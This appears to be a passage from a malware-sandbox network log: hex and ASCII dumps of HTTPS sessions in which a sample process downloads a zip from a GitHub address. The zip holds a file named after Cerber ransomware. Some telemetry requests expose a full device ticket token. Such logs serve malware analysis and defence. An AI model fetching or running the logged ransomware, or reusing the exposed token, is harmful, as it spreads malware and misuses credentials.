                                                                                                                                                    2022-09-29 13:00:59 UTC38795INData Raw: 87 81 9f a1 72 30 0d f3 fc d2 35 43 d9 5c 1d 9f 00 a8 c9 af 5f ba 08 6d 37 6f 12 47 40 02 85 7c 44 cf 6d 40 dc c2 56 32 20 ce 6a 8d 7b 1d 95 37 b4 9a 63 62 9e 38 fa f3 fc 16 7d b5 a5 7f d3 a1 02 f9 29 64 f4 9f de d7 37 31 9e 27 f4 0e 5d 94 bb d8 d6 1d 09 9b c0 58 d3 1a 67 99 47 ab c9 8d db 28 53 8e 4c c6 75 4a 51 bc 95 4a 87 eb 5a 44 65 b0 3a 1d 36 8e 5c 0d de 29 77 67 e2 34 0a d0 54 dc 5d 86 76 1c 08 89 a8 d1 7f fa bb 06 40 e7 d9 d0 40 92 8e ff fb 46 e9 9b 9f ce 93 a1 0e a2 62 d3 77 e5 91 a0 12 aa 37 42 94 7f 9a 5e 40 96 6b ef ea 52 4a c7 b2 f4 8a 5a d7 11 14 d1 36 db 7c a4 d3 9d d8 89 36 d7 61 73 09 07 84 0a 97 68 dd d8 eb 02 48 bb 5f ee bb 4c 5d c8 6f 50 22 39 b6 ab 6b f0 c8 73 53 8c 87 dc cc 4b 78 10 3b f7 69 c8 ef 82 d9 e1 31 6f e4 66 51 87 79 81 d6
                                                                                                                                                    Data Ascii: r05C\_m7oG@|Dm@V2 j{7cb8})d71']XgG(SLuJQJZDe:6\)wg4T]v@@Fbw7B^@kRJZ6|6ashH_L]oP"9ksSKx;i1ofQy
                                                                                                                                                    2022-09-29 13:01:00 UTC38811INData Raw: 90 70 30 94 7c 1f ae 95 d5 92 33 05 5e 83 44 07 53 00 08 8e 48 e9 a0 43 02 63 f5 3c 1e c1 c7 9b 86 f8 8f 5d 3a 41 ea 32 ac 5b e0 e2 6a bb 73 00 aa 24 2c e1 70 64 a5 34 cc cc a9 8f 1b 98 42 22 12 dd 7f 86 b0 81 51 12 1b b1 e0 38 be 82 0b 50 50 bd ff 83 b1 5d 38 cb ab 97 f7 b8 9a 05 69 12 96 b2 98 8d f2 1f a9 04 cf a1 e7 8c 45 b6 0d ef 7f 87 0b 0a 2a 08 b5 59 28 9a 8c 2c fd 34 3b dd 4c 6d 37 d0 4f a5 8e 58 92 16 46 91 44 d6 b9 62 8f c1 3c c7 a3 d0 ee 54 24 7e 5a b0 a6 f8 c7 94 b3 2d 05 e8 3d c0 9d f3 6e 33 10 83 e2 e4 49 b8 e3 3b 38 a2 a3 66 ff 6b 37 9a 66 5e ad 4c 04 9c 5e eb b8 3c 50 6a 96 36 b2 1b 99 86 22 60 c8 af dc 06 df 1e 74 d8 e8 72 fa 48 bb ff d3 32 23 dd fe c8 02 3e fc 5b d2 c2 1f c2 32 6f a6 c8 fb 8c 8b 26 7d b1 89 4f 39 27 e6 76 bf 49 06 d1 ad
                                                                                                                                                    Data Ascii: p0|3^DSHCc<]:A2[js$,pd4B"Q8PP]8iE*Y(,4;Lm7OXFDb<T$~Z-=n3I;8fk7f^L^<Pj6"`trH2#>[2o&}O9'vI
                                                                                                                                                    2022-09-29 13:01:00 UTC38827INData Raw: 14 6b b2 4b d1 9b d4 f9 95 6d b2 6d e6 23 e8 ff 53 7b f4 05 2a 3f 53 a3 a1 66 89 c1 91 dd 62 a6 bb 72 f3 a5 95 99 34 6c 7b df 00 c6 2a f8 23 95 d7 4f e8 b1 cb e5 c3 d6 2a fd a5 50 a8 97 23 5b 0f 79 b4 be b4 1d e1 45 6c 47 7a 5e 6d 5f f8 4a 2d 87 dc 55 c3 3f 5b 0e db b4 a0 f0 10 2b a3 6b 92 6b 87 c1 6b 69 18 aa 01 57 30 a7 22 32 76 21 22 62 db ed 73 ff 80 48 2d 27 ce f0 6e e4 fe 7a 24 12 d8 16 d7 fa 42 05 1b 4c d0 88 1e 7e 64 b1 0b 90 07 fb 36 c0 73 30 5c c5 77 41 f5 fc 63 d0 8a b3 f9 85 ff 58 4f 0c 4f d4 c2 59 a0 b7 98 6b 4e a0 79 0c 07 61 ee 51 ed 43 35 13 04 93 60 c6 7c 35 da fe b1 0f cd fa c9 3e a3 95 ce 1e ac f8 4b 9b 3b b0 aa d2 15 dc 45 8b 30 2a 32 b4 74 6c 02 14 ec f6 67 1c a5 3d 71 46 e5 78 5a 26 fa e9 29 b4 9e 44 d4 b8 8c 31 7d f3 9b af a9 31 44
                                                                                                                                                    Data Ascii: kKmm#S{*?Sfbr4l{*#O*P#[yElGz^m_J-U?[+kkkiW0"2v!"bsH-'nz$BL~d6s0\wAcXOOYkNyaQC5`|5>K;E0*2tlg=qFxZ&)D1}1D
                                                                                                                                                    2022-09-29 13:01:00 UTC38843INData Raw: 41 9a 8f 83 8f 02 7a cb 37 bb fd ca e7 a7 e0 3f 90 12 79 fa be c2 e9 9e 5f 68 cb 77 27 0f 26 34 5f f3 93 84 61 50 7a 3f ac 9b f4 5b 64 ff 5b ff 80 30 d6 60 af a3 8d e3 f4 cd d7 cc 1a 31 ca 5d 22 56 ac 1a a4 13 9c 47 97 6c 4b 01 55 df 3e aa 28 08 a9 aa 33 01 da 53 80 ce 06 4f 87 77 db 82 4c 6f 01 28 8e f6 7a 6e 66 44 56 cb b8 66 4f 24 25 90 f1 3c 10 5e 7c f5 09 94 4f b5 fa dc 84 d2 1d f1 a6 6c d4 3b 14 52 55 e9 b4 67 61 b8 43 72 bb 7e 46 63 a5 d0 b4 1c 38 71 d2 74 e5 81 f8 f0 ae 78 eb 70 1c a4 01 da 90 f8 43 d8 2f 82 ac 11 ce 1e 3d f3 5a 91 d6 8e 2f d7 19 9c b1 21 02 df f9 bc 5d 55 6d 89 4e 4c 42 48 68 bd f8 45 40 c5 d5 88 6c 42 bf 67 a4 c7 c2 dd 0c 1f a8 2d bc 92 e9 29 51 d1 4d 55 81 df 41 07 0f bb 54 1f 79 2e 19 f7 8c 61 32 c1 6b a2 5a 36 1b 80 ac af f4
                                                                                                                                                    Data Ascii: Az7?y_hw'&4_aPz?[d[0`1]"VGlKU>(3SOwLo(znfDVfO$%<^|Ol;RUgaCr~Fc8qtxpC/=Z/!]UmNLBHhE@lBg-)QMUATy.a2kZ6
                                                                                                                                                    2022-09-29 13:01:00 UTC38859INData Raw: 95 8b a4 c6 2c b0 5b 51 9f 28 9a f8 06 45 2f d9 53 4a 0a c1 b4 c5 63 2f 1d ba 07 6a 18 13 45 9c 18 a2 05 d3 87 18 b1 10 23 2e 1d 3c c2 06 dc bd 37 04 56 d0 b1 41 08 ed 33 fd 40 e7 7b 08 66 31 17 88 e1 81 ab eb d5 ea 29 55 31 01 ee f6 3b 22 54 0e 4e 1c e6 31 62 b2 3f f9 88 92 3e c1 f0 21 93 b6 2e 9a bf f8 88 a5 b0 b4 b4 40 a4 1c c9 e4 4c 0c 76 23 0b d0 ea 79 8b c3 26 0a 60 49 28 c4 4e 32 5e bd 4e 17 bb cb b8 22 27 03 dd c2 c1 dc a8 ec 04 c8 e5 e5 fd c1 a6 49 85 ca 24 d5 5f 9c 98 45 a8 72 bb cb 36 ce 71 49 bc 1c a1 d2 59 30 f7 f2 42 18 1b b8 d1 73 6f 84 8f eb ae 03 da 14 11 53 12 e2 f6 96 bb 07 f8 95 86 5b c9 f1 ba cd 92 3f a9 ef c7 95 fa 3a fa dc 76 1e c6 bd a1 c2 55 1d 08 21 55 e5 02 df f2 10 f0 9b b0 85 d3 66 75 cd dc b2 d6 03 d7 4e e3 65 b2 fd 64 18 15
                                                                                                                                                    Data Ascii: ,[Q(E/SJc/jE#.<7VA3@{f1)U1;"TN1b?>!.@Lv#y&`I(N2^N"'I$_Er6qIY0BsoS[?:vU!UfuNed
                                                                                                                                                    2022-09-29 13:01:00 UTC38875INData Raw: fa 3f 97 e0 b2 12 61 ba ea fd 30 36 3e 33 2e 0d cb 94 43 4b 7f 6d e9 43 11 8f d1 94 a5 b5 3f 40 5a c7 29 35 20 35 d1 12 36 f9 57 23 5b 7a 0e 2e 88 72 ae 0f 41 2a 34 00 83 72 eb ab bd 5c f0 9b a1 f4 bd 88 57 cf 32 6b 94 96 b7 80 a7 19 49 6d e4 76 46 ec a4 f5 42 b3 9c 43 c8 02 6c 3c 25 b3 b8 07 ff fa 90 64 cb 1b 99 08 cc b2 00 92 b3 4d 0e 07 e8 98 ce ff 11 b2 c4 d1 d7 49 32 d5 af 8b 37 2b 02 0f 65 74 6e c2 a2 75 c9 8d 44 49 8f e8 8f c7 d2 19 32 e2 b8 0f b6 39 aa b4 22 69 74 48 26 18 94 39 48 8b 1f a8 3e 91 d3 de 7a db 67 c1 10 69 3a 03 77 42 7c 09 16 db c0 da 3d de b5 3b fd 81 eb 47 de 8f a3 d6 2d 78 4c f8 e3 ec c2 a0 cb 85 4e 5f 59 99 08 3c 2c f1 91 7a c1 87 db 83 a7 56 2d 37 32 21 a2 56 10 30 09 db 21 ed ae e3 1e da 65 8d 86 a0 87 f4 5b 94 f7 e6 fd b6 de
                                                                                                                                                    Data Ascii: ?a06>3.CKmC?@Z)5 56W#[z.rA*4r\W2kImvFBCl<%dMI27+etnuDI29"itH&9H>zgi:wB|=;G-xLN_Y<,zV-72!V0!e[
                                                                                                                                                    2022-09-29 13:01:00 UTC38891INData Raw: 2b d8 98 c8 88 9a 66 69 3e 09 bd a4 64 cb b9 ca c5 57 db d2 d1 ea 2a 11 5f 40 32 44 6c 77 33 94 1e 74 46 c4 b2 98 3b c0 aa 5f 48 f2 8e 23 88 fb da be 6f 9a b8 f7 2e bc d1 34 c6 be 18 c3 90 95 17 02 08 0d 50 2a 20 90 82 12 03 aa 77 eb 32 bd 04 f1 91 92 d2 17 5c 85 52 4d 01 e1 ae a6 41 79 19 fe 43 5c 1b f6 d8 22 a5 26 b7 14 35 bf 4d 4c a5 22 bd 8b b3 89 9d 0e 45 31 8a 10 cf ea 62 43 af 9d 69 4c 01 6c bd 9e 53 b5 f7 15 c5 f8 d2 eb 58 dd e1 77 b0 d8 1f ea 54 38 36 8d 37 8f 56 61 b9 85 86 2b f1 9d 15 f1 fb 19 b2 45 da 9f e5 c9 7c a8 36 69 ce 4b 9a 2b 25 98 e5 f6 de 57 1b a7 07 e2 e0 08 42 6b 77 72 fd fa 49 b5 47 59 3e da 53 3e 99 b1 d3 39 0c 49 0e ba a8 f7 6e 56 1d f7 0c 28 f5 b3 59 06 99 57 15 19 0a 26 7f a1 d7 f7 26 63 e9 9a 62 9d fa 6f b8 a9 25 0b 2d 7d 05
                                                                                                                                                    Data Ascii: +fi>dW*_@2Dlw3tF;_H#o.4P* w2\RMAyC\"&5ML"E1bCiLlSXwT867Va+E|6iK+%WBkwrIGY>S>9InV(YW&&cbo%-}


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    158192.168.2.34987420.189.173.20443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:01:11 UTC38894OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    User-Agent: MSDW
                                                                                                                                                    MSA_DeviceTicket: t=EwC4AlN5BAAUx7kvJOvlZVsOh3du+AzMGpNViggAAQyg68hNd+pS9Cokwe9Vycw1xUmHLVSWEzL3ILk4ELKDB0EcA/Y5BMquB/Vr4wAzUg5izvEikn5Ygt0TdscvgTm/QeZEM03mTZb3cKyj6JF1AwIm0XjNFKOEJ2wiwyfJL3u7TQr3sGIFa48jJehodEV4DgGnOT77rplQNF9nix+Q67MOQO6E+nA91CE/gq12KW+C9IQOkWidi/EdkAgDryv6RYqXkuZmfl7p0kuXn6c8t2nK8sCAsMLbv7BXw4x2MOoR8EO97cdJHi/VZzqzuClMiFxYHJtSRtliL372+qEBnsU+EnPOOrL/z/ZiHPENFKIkRPbb/8l6KkMvLzfeI2cDZgAACNOqKCTKkDaTiAEAiCbHfOZdk37ebs4z9YlWK0ggABm5rlJR8mqKoukm5s59WGiTEsqaTsEqSuTQyAMtNdco9DDEAvt4+UMabUuNVDEWqzFfrHVrSdvQYjsDapDi7Pbjmu7yRtHNbrcghaauEFGvYmKB1OojJfqVlDlWn/kqifa1Q4NFlFw6WHgVAEgJlDC8ClLbpH9UlTeh3+xKs97H8FWS5YOaaMhWsjgMoBKupsWUsYgnaK0nOm640mhdaqhVns4fhXbe15xBWB1dmuDf692q8AqeBxx7Gj3D2e5z4hCLVGBWOzS+dlAggdr7HR/xo6TZoa1w0Uy+ha3Kc7+iHfFWH8U1SdI3ZiUzpvWZRT9p9Le/WWEhKvVrrHDYHWsUyVV94CvHzB2L6bfeAfFQJQE5yXQCxMvx6MbguJX2Yp84PBovQJfaNqSXR32KdTi12J/iQd2uTgVk0y6lvTSKrxN08DBFWr9qfPWF7wM89QXseKP8nHDXjPEjgimbyp8FAH0QrqADB29FmuasrPKg//o80bgB&p=
                                                                                                                                                    Content-Length: 4707
                                                                                                                                                    Host: watson.telemetry.microsoft.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    159192.168.2.34987620.189.173.21443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:01:14 UTC38895OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    User-Agent: MSDW
                                                                                                                                                    MSA_DeviceTicket: t=EwC4AlN5BAAUx7kvJOvlZVsOh3du+AzMGpNViggAAQyg68hNd+pS9Cokwe9Vycw1xUmHLVSWEzL3ILk4ELKDB0EcA/Y5BMquB/Vr4wAzUg5izvEikn5Ygt0TdscvgTm/QeZEM03mTZb3cKyj6JF1AwIm0XjNFKOEJ2wiwyfJL3u7TQr3sGIFa48jJehodEV4DgGnOT77rplQNF9nix+Q67MOQO6E+nA91CE/gq12KW+C9IQOkWidi/EdkAgDryv6RYqXkuZmfl7p0kuXn6c8t2nK8sCAsMLbv7BXw4x2MOoR8EO97cdJHi/VZzqzuClMiFxYHJtSRtliL372+qEBnsU+EnPOOrL/z/ZiHPENFKIkRPbb/8l6KkMvLzfeI2cDZgAACNOqKCTKkDaTiAEAiCbHfOZdk37ebs4z9YlWK0ggABm5rlJR8mqKoukm5s59WGiTEsqaTsEqSuTQyAMtNdco9DDEAvt4+UMabUuNVDEWqzFfrHVrSdvQYjsDapDi7Pbjmu7yRtHNbrcghaauEFGvYmKB1OojJfqVlDlWn/kqifa1Q4NFlFw6WHgVAEgJlDC8ClLbpH9UlTeh3+xKs97H8FWS5YOaaMhWsjgMoBKupsWUsYgnaK0nOm640mhdaqhVns4fhXbe15xBWB1dmuDf692q8AqeBxx7Gj3D2e5z4hCLVGBWOzS+dlAggdr7HR/xo6TZoa1w0Uy+ha3Kc7+iHfFWH8U1SdI3ZiUzpvWZRT9p9Le/WWEhKvVrrHDYHWsUyVV94CvHzB2L6bfeAfFQJQE5yXQCxMvx6MbguJX2Yp84PBovQJfaNqSXR32KdTi12J/iQd2uTgVk0y6lvTSKrxN08DBFWr9qfPWF7wM89QXseKP8nHDXjPEjgimbyp8FAH0QrqADB29FmuasrPKg//o80bgB&p=
                                                                                                                                                    Content-Length: 4597
                                                                                                                                                    Host: watson.telemetry.microsoft.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    16185.199.108.133443192.168.2.349715C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:52 UTC705INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 185620
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "2a6ab7c5316fce8fcdfa21d92de6f495abe9a21496869efff37027ac0d4eb5d5"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 9E7E:A32C:78ED2E:8681D5:6335928B
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:52 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6939-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456332.493050,VS0,VE241
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: bd5f56424b5994df776aeb4c1858d6eb307ba100
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:03:52 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:58:52 UTC706INData Raw: 50 4b 03 04 14 00 01 00 08 00 01 9c f5 4a 57 39 9c 5a 62 d4 02 00 f8 e4 04 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 43 65 72 62 65 72 35 2e 65 78 65 b3 65 c3 dc f7 40 a4 56 9a af 6a f2 79 cc 2c 79 59 8b af 8c 38 0a 8c 54 10 a7 df ac af 7a 8c 29 fd c4 6e 49 ec 85 d0 b3 ed 8c 20 81 e7 7f fc 7e 72 5c 18 04 0c 93 d2 8e 0f 2e 35 72 7c 8b 97 fc cb 24 10 a0 1e 13 7d 3c 96 80 f9 8a 0c b4 3d 06 97 40 f1 3a 8d c7 b9 1b 60 0c f7 bf c0 c3 dd 3a d6 b5 b1 77 61 f3 44 af 99 7d d7 9a a9 2d 28 38 5c ec bf 85 4f c7 26 7e 99 af ed 48 bf 1f 7e 53 e2 4f 1c 29 93 32 9a 5f d5 7d 8c 9a 1a 45 92 80 a5 6e 26 4a 14 9b 3f f3 10 df ac c9 3b b1 17 e9 99 1c 76 2b 9c f7 83 4d fd bb 4e f3 b4 73 91 2f 63 d7 27 41 25 cc 91 4f 9b 5e 70 c2 ec 61 ad c0 c3 ea e5 8d 28 2b 1d 29 ae f4 f8
                                                                                                                                                    Data Ascii: PKJW9ZbEndermanch@Cerber5.exee@Vjy,yY8Tz)nI ~r\.5r|$}<=@:`:waD}-(8\O&~H~SO)2_}En&J?;v+MNs/c'A%O^pa(+)
                                                                                                                                                    2022-09-29 12:58:52 UTC722INData Raw: ae 88 9a bb 4e 64 0a 40 e9 63 5b 70 4d 14 2b f4 09 30 91 ee b9 1f e8 a5 9b d3 10 70 cf ce 91 d4 fd 05 25 32 49 91 91 62 96 9d 44 56 17 ce 24 76 c0 51 35 7b b5 30 ff 62 32 08 88 3e 6d 17 6f 75 c3 50 77 6d 75 3c 66 c0 75 fc 4d 5d 90 40 ca 09 31 4b a9 85 6c e0 3a 59 46 dd 25 27 69 77 5a 4c 96 8e c0 2a b7 7a b3 ae ef cd 3d d6 7e ce ac a4 8f c0 d5 73 15 03 72 23 09 0a 14 4a a5 ca cb eb 15 c2 dc 2a 53 78 da 66 fb 14 01 3b f1 27 3d 9d a1 b7 f2 78 44 ef 93 76 27 77 d7 82 64 8d b6 ab 3c 16 3f 79 b4 47 9f 9c 0d 4f f3 dd d8 16 36 e5 a1 b9 c3 ea 21 7d 8e 3d 85 43 e5 64 10 d9 cc 4c 54 a4 63 e4 83 3c 9d df 75 5e 90 03 d4 36 c7 c6 4b d1 b8 8c c2 76 2a 28 ab a6 ef c6 60 f0 e5 0d c9 41 fb b0 18 52 7b c1 ff 56 c9 a4 30 ad 89 43 15 dc b8 48 9e 8f 91 60 f1 59 85 c6 20 be c6
                                                                                                                                                    Data Ascii: Nd@c[pM+0p%2IbDV$vQ5{0b2>mouPwmu<fuM]@1Kl:YF%'iwZL*z=~sr#J*Sxf;'=xDv'wd<?yGO6!}=CdLTc<u^6Kv*(`AR{V0CH`Y
                                                                                                                                                    2022-09-29 12:58:52 UTC738INData Raw: 1e 28 da ab d9 c9 dc ab 2b eb 07 f3 05 c0 a5 c1 92 14 76 cd ab 39 d5 ce 11 b9 b4 81 78 0c d2 91 d8 cd b6 65 b9 80 3b 2b b0 f2 6c 0f 69 87 c6 fe 58 2c de dc 4d 59 ad f6 d4 a1 ad 03 c7 5a f5 1f 7a 6f 24 50 bb 54 d0 f6 ba 5e 40 57 3d 7b 2c f6 5d fb 96 43 77 f2 69 7e 9a 71 95 81 10 40 88 af ed d1 5e 7a e6 44 eb ce c4 fc d9 1d 05 04 10 4f 65 1c c7 ac 65 4b 3e 6e 9c 59 cd b4 4c 01 ce 90 07 be 80 a8 1d 11 73 2d c0 4e 93 1d fe 75 68 85 6d 08 56 75 fa 22 12 e1 8f c5 58 05 52 af 73 1e 8f c3 2d 7f e9 9f b1 43 d1 e4 f1 39 e6 4a c7 95 80 fc 2f c8 41 45 56 7f ca e6 74 79 0d 5a b8 b8 d1 74 0b 8e 9a dc 0a cc 18 af 0f 7f 68 41 8d c6 6e 61 3f 46 df f8 32 90 0e f9 63 6b c3 3b 42 e8 77 c6 55 2b a4 d5 3c da 9a dc 8f c1 d4 8c 17 4a 0e 17 91 fb 27 8a 99 0e f1 b7 b7 ad 57 67 77
                                                                                                                                                    Data Ascii: (+v9xe;+liX,MYZzo$PT^@W={,]Cwi~q@^zDOeeK>nYLs-NuhmVu"XRs-C9J/AEVtyZthAna?F2ck;BwU+<J'Wgw
                                                                                                                                                    2022-09-29 12:58:52 UTC754INData Raw: d7 ef cd a6 4d 0d fb 49 c7 e2 d3 a7 ce 85 87 d9 fe bf 2d 91 8e b2 47 c6 0f fd 1a 6c 3b 30 98 8f fe ac 49 c0 e1 3b 34 10 53 a8 d1 e2 63 b7 55 c0 5f 1d c8 b4 dc 8b b0 f8 40 bf 45 89 15 77 3a a6 7a fe 13 2c 9f 09 46 b4 dc be f9 38 bd ba 5a ea 32 ce 6f dc 18 6a a0 b9 f6 59 c4 ac 8d fa 89 09 fd 52 b8 4a 8a 8c 62 76 be ae 7b 4c 7e 60 ee f1 28 37 a2 ee da dc 91 78 65 37 49 c5 0a e2 3a 27 1e 54 96 31 67 8d 0f 88 ec 45 87 be 65 47 39 61 dc 96 f2 ed ac 55 e2 37 e4 d5 aa f0 8f a2 6b 61 37 6a 75 22 50 6e 92 ce 26 bb 5b ce d7 fa 5b 7b d1 6d b0 a7 0d 40 f9 14 4a de 56 6d 84 4f c2 6c 61 65 22 ee 22 bd 38 55 e4 22 b6 d1 46 c6 e6 72 ac eb 36 28 c5 28 dc 36 44 98 78 2f da 18 56 d2 eb 39 4b f2 28 ab 59 19 48 b2 2f 58 f4 2b 7f 51 d7 4e 88 46 d6 da 38 06 a1 d2 74 19 43 a7 62
                                                                                                                                                    Data Ascii: MI-Gl;0I;4ScU_@Ew:z,F8Z2ojYRJbv{L~`(7xe7I:'T1gEeG9aU7ka7ju"Pn&[[{m@JVmOlae""8U"Fr6((6Dx/V9K(YH/X+QNF8tCb
                                                                                                                                                    2022-09-29 12:58:52 UTC770INData Raw: 73 d2 fc 41 ed b5 ab 41 58 95 cf 43 35 8e 03 0e 8a ff 40 12 34 88 23 01 9a 63 71 7e 76 4e 8e dd 5d cc 86 30 93 cb f3 5a 62 2a d3 77 c8 bf 56 42 24 bd 20 53 9e 7e 39 65 10 27 f3 82 70 b8 35 64 5c f8 d9 fa 02 d4 25 ad db 19 f5 6e 9f 2b 61 1e 63 b9 4a 6b f8 a1 2f e5 d5 95 fc 1f b0 87 e5 d0 6f af 05 b7 d9 f3 b5 47 2f ca 0c 0a 99 72 e6 4a 05 53 1d 9c c2 48 82 a4 18 1c 91 21 1e 26 7e 16 14 04 64 cb 48 a3 61 48 cc b1 26 08 02 b4 9b 45 df 31 8c 02 c2 80 7f b5 ca 8b 31 d1 db 1c f5 e1 4f 1e b2 78 86 65 af 4b 37 c4 b5 ba 36 3f c8 06 dd c4 0a 4b b6 f0 24 83 9b af a1 c7 aa c8 13 f2 98 a0 ca 73 1b d0 28 cf f6 e2 e4 4d 20 55 63 af a9 6d e3 6b c9 20 b5 98 4b 8f bc bf 9e ce cf d4 2d 2a 47 28 8b 23 14 14 2b 84 dc c9 30 34 54 f9 25 b5 95 71 b4 47 f9 a9 ad 15 1a 33 4f 0a f4
                                                                                                                                                    Data Ascii: sAAXC5@4#cq~vN]0Zb*wVB$ S~9e'p5d\%n+acJk/oG/rJSH!&~dHaH&E11OxeK76?K$s(M Ucmk K-*G(#+04T%qG3O
                                                                                                                                                    2022-09-29 12:58:52 UTC786INData Raw: 34 f0 2d 6d 16 93 6a a8 86 2a 58 27 f5 b0 a2 75 3d 3e 7c 7b 29 13 b1 9e 1e 00 82 ac fe d3 ce 95 b2 03 ad 7b 3b f0 a5 b5 40 87 6b 44 2e 2c 9f 3d a5 23 28 5a ed 57 35 1c ce a8 ae 49 21 14 c8 b6 06 95 09 7f 2f 45 77 69 cf 96 ba b0 57 04 83 94 c5 6b e6 2c 38 04 b0 2e eb 97 1f 19 28 e0 4b c2 9b 47 9f be 24 2f e9 72 53 39 9f ba 2b 13 35 26 a4 b2 a1 71 50 ea d7 44 ca 39 38 49 c8 7a b0 9b 6f 07 4a e1 7f ff 56 6a c9 0d 78 40 80 d0 a9 7f 2b 18 21 ae 44 91 a0 ab 92 33 81 e4 8b ff 91 0e 31 3a 21 d7 cb 19 48 81 50 81 e1 87 78 8f 20 64 06 65 15 74 d0 51 f8 1f db 56 77 2d b4 26 cb ce c0 f3 92 3a 33 b8 5f 69 49 03 55 94 6d cd cd 9b 0a f6 b0 1f 8d 1a 74 60 5c 24 33 1f e1 11 d5 8d 78 ed 5f 33 db 55 b4 5a 29 92 91 b7 63 65 fa 6e 52 2e 9a 4a bf d0 f9 ef d6 7a eb 7e b5 00 97
                                                                                                                                                    Data Ascii: 4-mj*X'u=>|{){;@kD.,=#(ZW5I!/EwiWk,8.(KG$/rS9+5&qPD98IzoJVjx@+!D31:!HPx detQVw-&:3_iIUmt`\$3x_3UZ)cenR.Jz~
                                                                                                                                                    2022-09-29 12:58:52 UTC802INData Raw: 2d 67 2b 7a 35 f6 39 84 36 e6 31 95 75 06 16 70 d5 45 a3 39 c6 54 aa 60 18 de b4 b3 f3 92 f5 ed 19 47 e8 59 fc 0e a9 ba 5a 6e 6e 98 e9 7a 9f d6 f0 62 74 4d 8f 19 7a a8 8d bf cd ca 1f 7d 12 35 6a 8b 06 8a 53 6c ac 6d 6d 9a 7c 30 70 8e b7 89 8a ed 82 dc 45 95 97 d0 75 f3 ad 68 cf 21 67 a4 ad f3 ee e8 53 94 3b 51 18 18 f7 a0 63 80 f9 be 98 33 ef 1b 85 12 a7 86 46 13 72 53 99 0a 77 e3 df 2c 08 bd aa 6e 0e b9 9b 13 58 23 3f 52 ae ed e9 56 53 af d0 c5 23 70 b6 fb 8e 97 65 87 c4 05 f2 4c ed 07 64 56 e1 cc 53 47 e6 7f 7c b5 68 bc ef 45 03 bd f3 e3 df d3 f6 95 0a 2b 87 68 15 e6 64 48 ad 53 60 de e9 59 53 cd 08 c1 19 52 f1 4d f8 3c 08 6b a1 7e 16 b7 33 fb 5d 0e 9f fe 80 df 4d cf f9 6d ae b0 71 6c ae b6 4d dc ac 67 df 6c 7b ed 71 f4 d5 52 ff 09 60 02 bc e9 60 a7 71
                                                                                                                                                    Data Ascii: -g+z5961upE9T`GYZnnzbtMz}5jSlmm|0pEuh!gS;Qc3FrSw,nX#?RVS#peLdVSG|hE+hdHS`YSRM<k~3]MmqlMgl{qR``q
                                                                                                                                                    2022-09-29 12:58:52 UTC818INData Raw: 55 80 87 71 a1 71 15 5d ec 72 a4 aa 70 80 94 33 e3 88 c9 82 30 4b 70 dd 66 d0 bc 94 59 f5 6d c7 1a c3 51 26 62 cb 0b a3 20 62 7d 1d 6b 43 c7 d4 74 ee 56 26 25 c8 d3 01 c3 74 e8 7d bd c0 1c 4b 66 a6 0e 3e 83 df 2e 36 85 4d 46 ad dc e8 55 52 62 cf 73 a1 65 29 9c 13 92 f0 84 9e 8a c2 90 83 56 b6 28 9b cd 63 31 18 cf ee 75 19 16 e9 58 fb 78 26 5f 6f 19 cc d8 ae 50 44 9c 7d 97 23 bb fb 72 e9 e9 44 14 aa 19 42 ec 33 ea 7c 51 35 49 65 32 f6 e4 e9 28 1c 82 d3 24 aa d0 dd dc 9b 05 48 ec 94 67 1d 3a 52 58 b1 99 c4 9f 93 a7 17 02 26 d6 35 fb 9d c7 80 a5 4c f4 5a 9e 1e d9 f6 b1 f9 6f 2c a4 e8 57 f5 18 9b 4f e8 1c 8e 29 ec 5f 76 a6 c2 36 29 b1 56 f6 f8 54 a4 cb 17 de 73 99 a2 26 7a bd 49 0a 64 16 39 60 ef 2e 64 2b 45 84 2d b0 7e 9d 66 fa 43 f9 6c bc cc 5f 93 af 3f 1e
                                                                                                                                                    Data Ascii: Uqq]rp30KpfYmQ&b b}kCtV&%t}Kf>.6MFURbse)V(c1uXx&_oPD}#rDB3|Q5Ie2($Hg:RX&5LZo,WO)_v6)VTs&zId9`.d+E-~fCl_?
